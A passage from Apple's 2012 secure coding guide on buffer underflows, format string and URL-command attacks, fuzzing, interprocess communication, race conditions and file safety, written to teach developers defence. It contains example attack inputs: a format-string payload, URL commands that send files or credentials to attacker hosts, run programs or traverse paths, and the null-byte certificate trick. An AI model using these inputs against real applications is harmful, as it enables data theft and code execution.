0x00000000a3662aa4 r27: 0x0000000000002f44 r28: 0x000000000034c840 r29: 0x0000000041414141 r30: 0x0000000041414141 r31: 0x0000000041414141 If there are any buffer overflows in your program, you should always assume that they are exploitable and fix them. It is much harder to prove that a buffer overflow is not exploitable than to just fix the bug. Also note that, although you can test for buffer overflows, you cannot test for the absence of buffer overflows; it is necessary, therefore, to carefully check every input and every buffer size calculation in your code. For more information on fuzzing, see “Fuzzing” (page 39) in “Validating Input And Interprocess Communication” (page 33). Avoiding Buffer Underflows Fundamentally, buffer underflows occur when two parts of your code disagree about the size of a buffer or the data in that buffer. For example, a fixed-length C string variable might have room for 256 bytes, but might contain a string that is only 12 bytes long. Buffer underflow conditions are not always dangerous; they become dangerous when correct operation depends upon both parts of your code treating the data in the same way. This often occurs when you read the buffer to copy it to another block of memory, to send it across a network connection, and so on. There are two broad classes of buffer underflow vulnerabilities: short writes, and short reads. Avoiding Buffer Overflows and Underflows Avoiding Buffer Underflows 2012-06-11 | © 2012 Apple Inc. All Rights Reserved. 29A short write vulnerability occurs when a short write to a buffer fails to fill the buffer completely. When this happens, some of the data that was previously in the buffer is still present after the write. If the application later performs an operation on the entire buffer (writing it to disk or sending it over the network, for example), that existing data comes along for the ride. The data could be random garbage data, but if the data happens to be interesting, you have an information leak. Further, when such an underflow occurs, if the values in those locations affect program flow, the underflow can potentially cause incorrect behavior up to and including allowing you to skip past an authentication or authorization step by leaving the existing authorization data on the stack from a previous call by another user, application, or other entity. Short write example (systemcall): For example, consider a UNIX system call that requires a command data structure, and includes an authorization token in that data structure. Assume that there are multiple versions of the data structure, with different lengths, so the system call takes both the structure and the length. Assume that the authorization token is fairly far down in the structure. Suppose a malicious application passesin a command structure, and passes a size that encompasses the data up to, but not including, the authorization token. The kernel’s system call handler calls copyin, which copies a certain number of bytes from the application into the data structure in the kernel’s address space. If the kernel does not zero-fill that data structure, and if the kernel does not check to see if the size is valid, there is a narrow possibility that the stack might still contain the previous caller’s authorization token at the same address in kernel memory. Thus, the attacker is able to perform an operation that should have been disallowed. A short read vulnerability occurs when a read from a buffer fails to read the complete contents of a buffer. If the program then makes decisions based on that short read, any number of erroneous behaviors can result. This usually occurs when a C string function is used to read from a buffer that does not actually contain a valid C string. A C string is defined as a string containing a series of bytes that ends with a null terminator. By definition, it cannot contain any null bytes prior to the end of the string. As a result, C-string-based functions, such as strlen, strlcpy, and strdup, copy a string until the first null terminator, and have no knowledge of the size of the original source buffer. By contrast, strings in other formats (a CFStringRef object, a Pascal string, or a CFDataRef blob) have an explicit length and can contain null bytes at arbitrary locations in the data. If you convert such a string into a C string and then evaluate that C string, you get incorrect behavior because the resulting C string effectively ends at the first null byte. Avoiding Buffer Overflows and Underflows Avoiding Buffer Underflows 2012-06-11 | © 2012 Apple Inc. All Rights Reserved. 30Short read example (SSL verification): An example of a short read vulnerability occurred in many SSL stacks a few years ago. By applying for an SSL cert for a carefully crafted subdomain of a domain that you own, you could effectively create a certificate that was valid for arbitrary domains. Consider a subdomain in the form targetdomain.tld[null_byte].yourdomain.tld. Because the certificate signing request contains a Pascalstring, assuming that the certificate authority interprets it correctly, the certificate authority would contact the owner of yourdomain.tld and would ask for permission to deliver the certificate. Because you own the domain, you would agree to it. You would then have a certificate that is valid for the rather odd-looking subdomain in question. When checking the certificate for validity, however, many SSL stacksincorrectly converted that Pascal string into a C string without any validity checks. When this happened, the resulting C string contained only the targetdomain.tld portion. The SSL stack then compared that truncated version with the domain the user requested, and interpreted the certificate as being valid for the targeted domain. In some cases, it was even possible to construct wildcard certificatesthat were valid for every possible domain in such browsers (*.com[null].yourdomain.tld would match every .com address, for example). If you obey the following rules, you should be able to avoid most underflow attacks: ● Zero-fill all buffers before use. A buffer that contains only zeros cannot contain stale sensitive information. ● Always check return values and fail appropriately. ● If a call to an allocation or initialization function fails (AuthorizationCopyRights, for example), do not evaluate the resulting data, as it could be stale. ● Use the value returned from read system calls and other similar calls to determine how much data was actually read. Then either: ● Use that result to determine how much data is present instead of using a predefined constant or ● fail if the function did not return the expected amount of data. ● Display an error and fail if a write call, printf call, or other output call returns without writing all of the data, particularly if you might later read that data back. ● When working with data structures that contain length information, always verify that the data is the size you expected. ● Avoid converting non-C strings (CFStringRef objects, NSString objects, Pascal strings, and so on) into C strings if possible. Instead, work with the strings in their original format. If this is not possible, always perform length checks on the resulting C string or check for null bytes in the source data. Avoiding Buffer Overflows and Underflows Avoiding Buffer Underflows 2012-06-11 | © 2012 Apple Inc. All Rights Reserved. 31● Avoid mixing buffer operations and string operations. If this is not possible, always perform length checks on the resulting C string or check for null bytes in the source data. ● Save files in a fashion that prevents malicious tampering or truncation. (See “Race Conditions and Secure File Operations” (page 43) for more information.) ● Avoid integer overflows and underflows. (See “Calculating Buffer Sizes” (page 25) for details.) Avoiding Buffer Overflows and Underflows Avoiding Buffer Underflows 2012-06-11 | © 2012 Apple Inc. All Rights Reserved. 32A major, and growing, source of security vulnerabilities is the failure of programs to validate all input from outside the program—that is, data provided by users, from files, over the network, or by other processes. This chapter describes some of the ways in which unvalidated input can be exploited, and some coding techniques to practice and to avoid. Risks of Unvalidated Input Any time your program accepts input from an uncontrolled source, there is a potential for a user to pass in data that does not conform to your expectations. If you don’t validate the input, it might cause problems ranging from program crashes to allowing an attacker to execute his own code. There are a number of ways an attacker can take advantage of unvalidated input, including: ● Buffer overflows ● Format string vulnerabilities ● URL commands ● Code insertion ● Social engineering Many Apple security updates have been to fix input vulnerabilities, including a couple of vulnerabilities that hackers used to “jailbreak” iPhones. Input vulnerabilities are common and are often easily exploitable, but are also usually easily remedied. Causing a Buffer Overflow If your application takesinput from a user or other untrusted source, itshould never copy data into a fixed-length buffer without checking the length and truncating it if necessary. Otherwise, an attacker can use the input field to cause a buffer overflow. See “Avoiding Buffer Overflows And Underflows” (page 17) to learn more. 2012-06-11 | © 2012 Apple Inc. All Rights Reserved. 33 Validating Input and Interprocess CommunicationFormat String Attacks If you are taking input from a user or other untrusted source and displaying it, you need to be careful that your display routines do not processformatstringsreceived from the untrusted source. For example, in the following code the syslog standard C library function is used to write a received HTTP request to the system log. Because the syslog function processes format strings, it will process any format strings included in the input packet: /* receiving http packet */ int size = recv(fd, pktBuf, sizeof(pktBuf), 0); if (size) { syslog(LOG_INFO, "Received new HTTP request!"); syslog(LOG_INFO, pktBuf); } Many formatstrings can cause problemsfor applications. For example,suppose an attacker passesthe following string in the input packet: "AAAA%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%n" This string retrieves eight items from the stack. Assuming that the format string itself is stored on the stack, depending on the structure of the stack, this might effectively move the stack pointer back to the beginning of the format string. Then the %n token would cause the print function to take the number of bytes written so far and write that value to the memory address stored in the next parameter, which happens to be the format string. Thus, assuming a 32-bit architecture, the AAAA in the format string itself would be treated as the pointer value 0x41414141, and the value at that address would be overwritten with the number 76. Doing this will usually cause a crash the next time the system has to access that memory location, but by using a string carefully crafted for a specific device and operating system, the attacker can write arbitrary data to any location. See the manual page for printf(3) for a full description of format string syntax. To prevent format string attacks, make sure that no input data is ever passed as part of a format string. To fix this, just include your own format string in each such function call. For example, the call printf(buffer) may be subject to attack, but the call printf("%s", buffer) is not. In the second case, all characters in the buffer parameter—including percent signs (%)—are printed out rather than being interpreted as formatting tokens. Validating Input and Interprocess Communication Risks of Unvalidated Input 2012-06-11 | © 2012 Apple Inc. All Rights Reserved. 34This situation can be made more complicated when a string is accidentally formatted more than once. In the following example, the informativeTextWithFormat argument of the NSAlert method alertWithMessageText:defaultButton:alternateButton:otherButton:informativeTextWithFormat: calls the NSString method stringWithFormat:GetLocalizedString rather than simply formatting the message string itself. As a result, the string is formatted twice, and the data from the imported certificate is used as part of the format string for the NSAlert method: alert = [NSAlert alertWithMessageText:"Certificate Import Succeeded" defaultButton:"OK" alternateButton:nil otherButton:nil informativeTextWithFormat:[NSString stringWithFormat: @"The imported certificate \"%@\" has been selected in the certificate pop-up.", [selectedCert identifier]]]; [alert setAlertStyle:NSInformationalAlertStyle]; [alert runModal]; Instead, the string should be formatted only once, as follows: [alert informativeTextWithFormat:@"The imported certificate \"%@\" has been selected in the certificate pop-up.", [selectedCert identifier]]; The following commonly-used functions and methods are subject to format-string attacks: ● Standard C ● printf and other functions listed on the printf(3) manual page ● scanf and other functions listed on the scanf(3) manual page ● syslog and vsyslog ● Carbon ● CFStringCreateWithFormat ● CFStringCreateWithFormatAndArguments ● CFStringAppendFormat ● AEBuildDesc Validating Input and Interprocess Communication Risks of Unvalidated Input 2012-06-11 | © 2012 Apple Inc. All Rights Reserved. 35● AEBuildParameters ● AEBuildAppleEvent ● Cocoa ● [NSString stringWithFormat:] and other NSString methods that take formatted strings as arguments ● [NSString initWithFormat:] and other NSStringmethodsthattake formatstrings as arguments ● [NSMutableString appendFormat:] ● [NSAlert alertWithMessageText:defaultButton:alternateButton:otherButton:informativeTextWithFormat:] ● [NSPredicate predicateWithFormat:] and [NSPredicate predicateWithFormat:arguments:] ● [NSException raise:format:] and [NSException raise:format:arguments:] ● NSRunAlertPanel and other Application Kit functions that create or return panels or sheets URLs and File Handling If your application has registered a URL scheme, you have to be careful about how you process commands sent to your application through the URL string. Whether you make the commands public or not, hackers will try sending commandsto your application. If, for example, you provide a link or linksto launch your application from your web site, hackers will look to see what commands you’re sending and will try every variation on those commands they can think of. You must be prepared to handle, or to filter out, any commands that can be sent to your application, not only those commands that you would like to receive. For example, if you accept a command that causes your application to send credentials back to your web server, don’t make the function handler general enough so that an attacker can substitute the URL of their own web server. Here are some examples of the sorts of commands that you should not accept: ● myapp://cmd/run?program=/path/to/program/to/run ● myapp://cmd/set_preference?use_ssl=false ● myapp://cmd/sendfile?to=evil@attacker.com&file=some/data/file ● myapp://cmd/delete?data_to_delete=my_document_ive_been_working_on ● myapp://cmd/login_to?server_to_send_credentials=some.malicious.webserver.com In general, don’t accept commands that include arbitrary URLs or complete pathnames. Validating Input and Interprocess Communication Risks of Unvalidated Input 2012-06-11 | © 2012 Apple Inc. All Rights Reserved. 36If you accept text or other data in a URL command that you subsequently include in a function or method call, you could be subject to a format string attack (see “Format String Attacks” (page 34)) or a buffer overflow attack (see “Causing a Buffer Overflow” (page 33)). If you accept pathnames, be careful to guard againststrings that might redirect a call to another directory; for example: myapp://use_template?template=/../../../../../../../../some/other/file Code Insertion Unvalidated URL commands and textstringssometimes allow an attacker to insert code into a program, which the program then executes. For example, if your application processes HTML and Javascript when displaying text, and displays strings received through a URL command, an attacker could send a command something like this: myapp://cmd/adduser='>"> Similarly, HTML and other scripting languages can be inserted through URLs, text fields, and other data inputs, such as command lines and even graphics or audio files. You should either not execute scripts in data from an untrusted source, or you should validate all such data to make sure it conforms to your expectations for input. Never assume that the data you receive is well formed and valid; hackers and malicious users will try every sort of malformed data they can think of to see what effect it has on your program. Social Engineering Social engineering—essentially tricking the user—can be used with unvalidated input vulnerabilities to turn a minor annoyance into a major problem. For example, if your program accepts a URL command to delete a file, but first displays a dialog requesting permission from the user, you might be able to send a long-enough string to scroll the name of the file to be deleted past the end of the dialog. You could trick the user into thinking he was deleting something innocuous, such as unneeded cached data. For example: myapp://cmd/delete?file=cached data that is slowing down your system.,realfile The user then might see a dialog with the text “Are you sure you want to delete cached data that is slowing down your system.” The name of the real file, in this scenario, is out of sight below the bottom of the dialog window. When the user clicks the “OK” button, however, the user’s real data is deleted. Other examples of social engineering attacks include tricking a user into clicking on a link in a malicious web site or following a malicious URL. For more information about social engineering, read “Designing Secure User Interfaces” (page 73). Validating Input and Interprocess Communication Risks of Unvalidated Input 2012-06-11 | © 2012 Apple Inc. All Rights Reserved. 37Modifications to Archived Data Archiving data, also known as object graph serialization, refers to converting a collection of interconnected objects into an architecture-independent stream of bytes that preserves the identity of and the relationships between the objects and values. Archives are used for writing data to a file, transmitting data between processes or across a network, or performing other types of data storage or exchange. For example, in Cocoa, you can use a coder object to create and read from an archive, where a coder object is an instance of a concrete subclass of the abstract class NSCoder. Object archives are problematic from a security perspective for several reasons. First, an object archive expands into an object graph that can contain arbitrary instances of arbitrary classes. If an attacker substitutes an instance of a different class than you were expecting, you could get unexpected behavior. Second, because an application must know the type of data stored in an archive in order to unarchive it, developers typically assume that the values being decoded are the same size and data type as the values they originally coded. However, when the data is stored in an insecure manner before being unarchived, this is not a safe assumption. If the archived data is not stored securely, it is possible for an attacker to modify the data before the application unarchives it. If your initWithCoder: method does not carefully validate all the data it’s decoding to make sure it is well formed and does not exceed the memory space reserved for it, then by carefully crafting a corrupted archive, an attacker can cause a buffer overflow or trigger another vulnerability and possibly seize control of the system. Third, some objects return a different object during unarchiving (see the NSKeyedUnarchiverDelegate method unarchiver:didDecodeObject:) or when they receive the message awakeAfterUsingCoder:. NSImage is one example of such a class—it may register itself for a name when unarchived, potentially taking the place of an image the application uses. An attacker might be able to take advantage of this to insert a maliciously corrupt image file into an application. It’s worth keeping in mind that, even if you write completely safe code, there mightstill be security vulnerabilities in libraries called by your code. Specifically, the initWithCoder: methods of the superclasses of your classes are also involved in unarchiving. To be completely safe, you should avoid using archived data as a serialization format for data that could potentially be stored or transmitted in an insecure fashion or that could potentially come from an untrusted source. Note that nib files are archives, and these cautions apply equally to them. A nib file loaded from a signed application bundle should be trustable, but a nib file stored in an insecure location is not. Validating Input and Interprocess Communication Risks of Unvalidated Input 2012-06-11 | © 2012 Apple Inc. All Rights Reserved. 38See “Risks of Unvalidated Input” (page 33) for more information on the risks of reading unvalidated input, “Securing File Operations” (page 47) for techniques you can use to keep your archive files secure, and the other sections in this chapter for details on validating input. Fuzzing Fuzzing, or fuzz testing, is the technique of randomly or selectively altering otherwise valid data and passing it to a program to see what happens. If the program crashes or otherwise misbehaves, that’s an indication of a potential vulnerability that might be exploitable. Fuzzing is a favorite tool of hackers who are looking for buffer overflows and the other types of vulnerabilities discussed in this chapter. Because it will be employed by hackers against your program, you should use it first, so you can close any vulnerabilities before they do. Although you can never prove that your program is completely free of vulnerabilities, you can at least get rid of any that are easy to find this way. In this case, the developer’s job is much easier than that of the hacker. Whereas the hacker has to not only find input fields that might be vulnerable, but also must determine the exact nature of the vulnerability and then craft an attack that exploits it, you need only find the vulnerability, then look at the source code to determine how to close it. You don’t need to prove that the problem is exploitable—just assume that someone will find a way to exploit it, and fix it before they get an opportunity to try. Fuzzing is best done with scripts orshort programsthat randomly vary the input passed to a program. Depending on the type of input you’re testing—text field, URL, data file, and so forth—you can try HTML, javascript, extra long strings, normally illegal characters, and so forth. If the program crashes or does anything unexpected, you need to examine the source code that handles that input to see what the problem is, and fix it. For example, if your program asksfor a filename, you should attempt to enter a string longer than the maximum legal filename. Or, if there is a field that specifies the size of a block of data, attempt to use a data block larger than the one you indicated in the size field. The most interesting valuesto try when fuzzing are usually boundary values. For example, if a variable contains a signed integer, try passing the maximum and minimum values allowed for a signed integer of thatsize, along with 0, 1, and -1. If a data field should contain a string with no fewer than 1 byte and no more than 42 bytes, try zero bytes, 1 byte, 42 bytes, and 43 bytes. And so on. In addition to boundary values, you should also try values that are way, way outside the expected values. For example, if your application is expecting an image that is up to 2,000 pixels by 3,000 pixels, you might modify the size fields to claim that the image is 65,535 pixels by 65,535 pixels. Using large values can uncover integer overflow bugs (and in some cases, NULL pointer handling bugs when a memory allocation fails). See “Avoiding Integer Overflows And Underflows” (page 27) in “Avoiding Buffer Overflows And Underflows” (page 17) for more information about integer overflows. Validating Input and Interprocess Communication Fuzzing 2012-06-11 | © 2012 Apple Inc. All Rights Reserved. 39Inserting additional bytes of data into the middle or end of a file can also be a useful fuzzing technique in some cases. For example, if a file’s header indicates that it contains 1024 bytes after the header, the fuzzer could add a 1025th byte. The fuzzer could add an additional row or column of data in an image file. And so on. Interprocess Communication and Networking When communicating with another process, the most important thing to remember isthat you cannot generally verify that the other process has not been compromised. Thus, you must treat it as untrusted and potentially hostile. All interprocess communication is potentially vulnerable to attacks if you do not properly validate input, avoid race conditions, and perform any other tests that are appropriate when working with data from a potentially hostile source. Above and beyond these risks, however,some forms of interprocess communication have specific risksinherent to the communication mechanism. This section describes some of those risks. Mach messaging When working with Mach messaging, it is important to never give the Mach task port of your process to any other. If you do, you are effectively allowing that process to arbitrarily modify the address space your process, which makes it trivial to compromise your process. Instead, you should create a Mach port specifically for communicating with a given client. Note: Mach messaging in OS X is not a supported API. No backwards compatibility guarantees are made for applications that use it anyway. Remote procedure calls (RPC) and Distributed Objects: If your application uses remote procedure calls or Distributed Objects, you are implicitly saying that you fully trust whatever processis at the other end of the connection. That process can call arbitrary functions within your code, and may even be able to arbitrarily overwrite portions of your code with malicious code. For thisreason, you should avoid using remote procedure calls or DistributedObjects when communicating with potentially untrusted processes, and in particular, you should never use these communication technologies across a network boundary. Shared Memory: If you intend to share memory across applications, be careful to allocate any memory on the heap in page-aligned, page-sized blocks. If you share a block of memory that is not a whole page (or worse, if you share some portion of your application’s stack), you may be providing the process at the other end Validating Input and Interprocess Communication Interprocess Communication and Networking 2012-06-11 | © 2012 Apple Inc. All Rights Reserved. 40with the ability to overwrite portions of your code,stack, or other data in waysthat can produce incorrect behavior, and may even allow injection of arbitrary code. In addition to these risks, some forms of shared memory can also be subject to race condition attacks. Specifically, memory mapped files can be replaced with other files between when you create the file and when you open it. See “Securing File Operations” (page 47) for more details. Finally, named shared memory regions and memory mapped files can be accessed by any other process running as the user. For this reason, it is not safe to use non-anonymous shared memory for sending highly secret information between processes. Instead, allocate your shared memory region prior to creating the child processthat needsto share that region, then pass IPC_PRIVATE asthe key for shmget to ensure that the shared memory identifier is not easy to guess. Note: Shared memory regions are detached if you call exec or other similar functions. If you need to pass data in a secure way across an exec boundary, you must pass the shared memory ID to the child process. Ideally, you should do this using a secure mechanism, such as a pipe created using a call to pipe. After the last child process that needs to use a particular shared memory region is running, the process that created the region should call shmctl to remove the shared memory region. Doing so ensures that no further processes can attach to that region even if they manage to guess the region ID. shmctl(id, IPC_RMID, NULL); Signals: A signal, in this context, is a particular type of content-free message sent from one process to another in a UNIX-based operating system such as OS X. Any program can register a signal handler function to perform specific operations upon receiving a signal. In general, it is not safe to do a significant amount of work in a signal handler. There are only a handful of library functions and system callsthat are safe to use in a signal handler (referred to as async-signal-safe calls), and this makes it somewhat difficult to safely perform work inside a call. More importantly, however, as a programmer, you are not in control of when your application receives a signal. Thus, if an attacker can cause a signal to be delivered to your process (by overflowing a socket buffer, for example), the attacker can cause your signal handler code to execute at any time, between any two lines of code in your application. This can be problematic if there are certain places where executing that code would be dangerous. For example, in 2004, a signal handler race condition was found in open-source code present in many UNIX-based operating systems. This bug made it possible for a remote attacker to execute arbitrary code Validating Input and Interprocess Communication Interprocess Communication and Networking 2012-06-11 | © 2012 Apple Inc. All Rights Reserved. 41or to stop the FTP daemon from working by causing it to read data from a socket and execute commands while it was still running as the root user. [CVE-2004-0794] For this reason, signal handlers should do the minimum amount of work possible, and should perform the bulk of the work at a known location within the application’s main program loop. For example, in an application based on Foundation or Core Foundation, you can create a pair of connected sockets by calling socketpair, call setsockopt to set the socket to non-blocking, turn one end into a CFStream object by calling CFStreamCreatePairWithSocket, and then schedule that stream on your run loop. Then, you can install a minimal signal handler that uses the write system call (which is async-signal-safe according to POSIX.1) to write data into the other socket. When the signal handler returns, your run loop will be woken up by data on the other socket, and you can then handle the signal at your convenience. Important: If you are writing to a socket in a signal handler and reading from it in a run loop on your main program thread, you must set the socket to non-blocking. If you do not, it is possible to cause your application to hang by sending it too many signals. The queue for a socket is of finite size. When it fills up, if the socket is set to non-blocking, the write call fails, and the global variable errno is set to EAGAIN. If the socket is blocking, however, the write call blocks until the queue empties enough to write the data. If a write call in a signal handler blocks, this prevents the signal handler from returning execution to the run loop. If that run loop is responsible for reading data from the socket, the queue will never empty, the write call will never unblock, and your application will basically hang (at least until the write call isinterrupted by anothersignal). Validating Input and Interprocess Communication Interprocess Communication and Networking 2012-06-11 | © 2012 Apple Inc. All Rights Reserved. 42When working with shared data, whether in the form of files, databases, network connections,shared memory, or other forms of interprocess communication, there are a number of easily made mistakesthat can compromise security. This chapter describes many such pitfalls and how to avoid them. Avoiding Race Conditions A race condition exists when changes to the order of two or more events can cause a change in behavior. If the correct order of execution is required for the proper functioning of the program, this is a bug. If an attacker can take advantage of the situation to insert malicious code, change a filename, or otherwise interfere with the normal operation of the program, the race condition is a security vulnerability. Attackers can sometimes take advantage of small time gaps in the processing of code to interfere with the sequence of operations, which they then exploit. OS X, like all modern operating systems, is a multitasking OS; that is, it allows multiple processes to run or appear to run simultaneously by rapidly switching among them on each processor. The advantagesto the user are many and mostly obvious; the disadvantage, however, is that there is no guarantee that two consecutive operations in a given process are performed without any other process performing operations between them. In fact, when two processes are using the same resource (such as the same file), there is no guarantee that they will access that resource in any particular order unless both processes explicitly take steps to ensure it. For example, if you open a file and then read from it, even though your application did nothing else between these two operations, some other process might alter the file after the file was opened and before it was read. If two different processes (in the same or different applications) were writing to the same file, there would be no way to know which one would write first and which would overwrite the data written by the other. Such situations cause security vulnerabilities. There are two basic types of race condition that can be exploited: time of check–time of use (TOCTOU), and signal handling. 2012-06-11 | © 2012 Apple Inc. All Rights Reserved. 43 Race Conditions and Secure File OperationsTime of Check Versus Time of Use It is fairly common for an application to need to check some condition before undertaking an action. For example, it might check to see if a file exists before writing to it, or whether the user has access rights to read a file before opening it for reading. Because there is a time gap between the check and the use (even though it might be a fraction of a second), an attacker can sometimes use that gap to mount an attack. Thus, this is referred to as a time-of-check–time-of-use problem. Temporary Files A classic example isthe case where an application writestemporary filesto publicly accessible directories. You can set the file permissions of the temporary file to prevent another user from altering the file. However, if the file already exists before you write to it, you could be overwriting data needed by another program, or you could be using a file prepared by an attacker, in which case it might be a hard link or symbolic link, redirecting your output to a file needed by the system or to a file controlled by the attacker. To prevent this, programs often check to make sure a temporary file with a specific name does not already exist in the target directory. If such a file exists, the application deletes it or chooses a new name for the temporary file to avoid conflict. If the file does not exist, the application opensthe file for writing, because the system routine that opens a file for writing automatically creates a new file if none exists. An attacker, by continuously running a program that creates a new temporary file with the appropriate name, can (with a little persistence and some luck) create the file in the gap between when the application checked to make sure the temporary file didn’t exist and when it opens it for writing. The application then opensthe attacker’sfile and writesto it (remember, the system routine opens an existing file if there is one, and creates a new file only if there is no existing file). The attacker’s file might have different access permissions than the application’s temporary file, so the attacker can then read the contents. Alternatively, the attacker might have the file already open. The attacker could replace the file with a hard link or symbolic link to some other file (either one owned by the attacker or an existing system file). For example, the attacker could replace the file with a symbolic link to the system password file, so that after the attack, the system passwords have been corrupted to the point that no one, including the system administrator, can log in. For a real-world example, in a vulnerability in a directory server, a server script wrote private and public keys into temporary files, then read those keys and put them into a database. Because the temporary files were in a publicly writable directory, an attacker could have created a race condition by substituting the attacker’s own files (or hard links or symbolic links to the attacker’s files) before the keys were reread, thus causing the script to insert the attacker’s private and public keys instead. After that, anything Race Conditions and Secure File Operations Avoiding Race Conditions 2012-06-11 | © 2012 Apple Inc. All Rights Reserved. 44encrypted or authenticated using those keys would be under the attacker’s control. Alternatively, the attacker could have read the private keys, which can be used to decrypt encrypted data. [CVE-2005-2519] Similarly, if an application temporarily relaxes permissions on files or folders in order to perform some operation, an attacker might be able to create a race condition by carefully timing his or her attack to occur in the narrow window in which those permissions are relaxed. To learn more about creating temporary files securely, read “Create Temporary Files Correctly” (page 50). Interprocess Communication Time-of-check–time-of-use problems do not have to involve files, of course. They can apply to any data storage or communications mechanism that does not perform operations atomically. Suppose, for example, that you wrote a program designed to automatically count the number of people entering a sports stadium for a game. Each turnstile talks to a web service running on a server whenever someone walks through. Each web service instance inherently runs as a separate process. Each time a turnstile sends a signal, an instance of the web service starts up, retrievesthe gate count from a database, increments it by one, and writes it back to the database. Thus, multiple processes are keeping a single running total. Now suppose two people enter different gates at exactly the same time. The sequence of events might then be as follows: 1. Server process A receives a request from gate A. 2. Server process B receives a request from gate B. 3. Server process A reads the number 1000 from the database. 4. Server process B reads the number 1000 from the database. 5. Server process A increments the gate count by 1 so that Gate == 1001. 6. Server process B increments the gate count by 1 so that Gate == 1001. 7. Server process A writes 1001 as the new gate count. 8. Server process B writes 1001 as the new gate count. Because server process B read the gate count before process A had time to increment it and write it back, both processesread the same value. After process A incrementsthe gate count and writesit back, process B overwrites the value of the gate count with the same value written by process A. Because of this race condition, one of the two people entering the stadium was not counted. Since there might be long lines at each turnstile, this condition might occur many times before a big game, and a dishonest ticket clerk who knew about this undercount could pocket some of the receipts with no fear of being caught. Other race conditions that can be exploited, like the example above, involve the use of shared data or other interprocess communication methods. If an attacker can interfere with important data after it is written and before it isre-read, he orshe can disrupt the operation of the program, alter data, or do other Race Conditions and Secure File Operations Avoiding Race Conditions 2012-06-11 | © 2012 Apple Inc. All Rights Reserved. 45mischief. The use of non-thread-safe calls in multithreaded programs can result in data corruption. If an attacker can manipulate the program to cause two such threads to interfere with each other, it may be possible to mount a denial-of-service attack. In some cases, by using such a race condition to overwrite a buffer in the heap with more data than the buffer can hold, an attacker can cause a buffer overflow. As discussed in “Avoiding Buffer Overflows And Underflows” (page 17), buffer overflows can be exploited to cause execution of malicious code. The solution to race conditions involving shared data is to use a locking mechanism to prevent one process from changing a variable until another is finished with it. There are problems and hazards associated with such mechanisms, however, and they must be implemented carefully. And, of course, locking mechanisms only apply to processes that participate in the locking scheme. They cannot prevent an untrusted application from modifying the data maliciously. For a full discussion, see Wheeler, Secure Programming for Linux and Unix HOWTO, at http://www.dwheeler.com/secure-programs/. Time-of-check–time-of-use vulnerabilities can be prevented in different ways, depending largely on the domain of the problem. When working with shared data, you should use locking to protect that data from other instances of your code. When working with data in publicly writable directories, you should also take the precautions described in “Files In Publicly Writable Directories Are Dangerous” (page 51). Signal Handling Because signal handlers execute code at arbitrary times, they can be used to cause incorrect behavior. In daemons running as root, running the wrong code at the wrong time can even cause privilege escalation. “Securing Signal Handlers” (page 46) describes this problem in more detail. Securing Signal Handlers Signal handlers are another common source of race conditions. Signalsfrom the operating system to a process or between two processes are used for such purposes as terminating a process or causing it to reinitialize. If you include signal handlers in your program, they should not make any system calls and should terminate as quickly as possible. Although there are certain system calls that are safe from within signal handlers, writing a safe signal handler that does so is tricky. The best thing to do is to set a flag that your program checks periodically, and do no other work within the signal handler. Thisis because the signal handler can be interrupted by a new signal before it finishes processing the first signal, leaving the system in an unpredictable state or, worse, providing a vulnerability for an attacker to exploit. Race Conditions and Secure File Operations Securing Signal Handlers 2012-06-11 | © 2012 Apple Inc. All Rights Reserved. 46For example, in 1997, a vulnerability wasreported in a number of implementations of the FTP protocol in which a user could cause a race condition by closing an FTP connection. Closing the connection resulted in the near-simultaneous transmission of two signals to the FTP server: one to abort the current operation, and one to log out the user. The race condition occurred when the logout signal arrived just before the abort signal. When a user logged onto an FTP server as an anonymous user, the server would temporarily downgrade its privilegesfrom root to nobody so that the logged-in user had no privilegesto write files. When the user logged out, however, the server reassumed root privileges. If the abort signal arrived at just the right time, it would abort the logout procedure after the server had assumed root privileges but before it had logged out the user. The user would then be logged in with root privileges, and could proceed to write files at will. An attacker could exploit this vulnerability with a graphical FTP client simply by repeatedly clicking the “Cancel” button. [CVE-1999-0035] For a brief introduction to signal handlers, see the Little Unix Programmers Group site at http://users.actcom.co.il/~choo/lupg/tutorials/signals/signals-programming.html. For a discourse on how signal handler race conditions can be exploited,see the article by Michal Zalewski at http://www.bindview.com/Services/razor/Papers/2001/signals.cfm. Securing File Operations Insecure file operations are a major source of security vulnerabilities. In some cases, opening or writing to a file in an insecure fashion can give attackers the opportunity to create a race condition (see “Time of Check Versus Time of Use” (page 44)). Often, however, insecure file operations give an attacker the ability to read confidential information, perform a denial of service attack, take control of an application, or even take control of the entire system. This section discusses what you should do to make your file operations more secure. Check Result Codes Always check the result codes of every routine that you call. Be prepared to handle the situation if the operation fails. Most file-based security vulnerabilities could have been avoided if the developers of the programs had checked result codes. Some common mistakes are listed below. When writing to files or changing file permissions A failure when change permissions on a file or to open a file for writing can be caused by many things, including: ● Insufficient permissions on the file or enclosing directory. Race Conditions and Secure File Operations Securing File Operations 2012-06-11 | © 2012 Apple Inc. All Rights Reserved. 47● The immutable flag (set with the chflags utility or the chflags system call). ● A network volume becoming unavailable. ● An external drive getting unplugged. ● A drive failure. Depending on the nature of your software, any one of these could potentially be exploited if you do not properly check error codes. See the manual pages for the chflags, chown, and chgrp commands and the chflags and chown functions for more information. When removing files Although the rm command can often ignore permissions if you pass the -f flag, it can still fail. For example, you can’t remove a directory that has anything inside it. If a directory is in a location where other users have access to it, any attempt to remove the directory might fail because another process might add new files while you are removing the old ones. The safest way to fix this problem is to use a private directory that no one else has access to. If that’s not possible, check to make sure the rm command succeeded and be prepared to handle failures. Watch Out for Hard Links A hard link is a second name for a file—the file appears to be in two different locations with two different names. If a file has two (or more) hard links and you check the file to make sure that the ownership, permissions, and so forth are all correct, but fail to check the number of links to the file, an attacker can write to or read from the file through their own link in their own directory. Therefore, among other checks before you use a file, you should check the number of links. Do not, however, simply fail if there’s a second link to a file, because there are some circumstances where a link is okay or even expected. For example, every directory islinked into at least two placesin the hierarchy—the directory name itself and the special . record from the directory that links back to itself. Also, if that directory contains other directories, each of those subdirectories contains a .. record that points to the outer directory. You need to anticipate such conditions and allow for them. Even if the link is unexpected, you need to handle the situation gracefully. Otherwise, an attacker can cause denial of service just by creating a link to the file. Instead, you should notify the user of the situation, giving them as much information as possible so they can try to track down the source of the problem. Race Conditions and Secure File Operations Securing File Operations 2012-06-11 | © 2012 Apple Inc. All Rights Reserved. 48Watch Out for Symbolic Links A symbolic link is a special type of file that contains a path name. Symbolic links are more common than hard links. Functions that follow symbolic links automatically open, read, or write to the file whose path name is in the symbolic link file rather than the symbolic link file itself. Your application receives no notification that a symbolic link was followed; to your application, it appears as if the file addressed is the one that was used. An attacker can use a symbolic link, 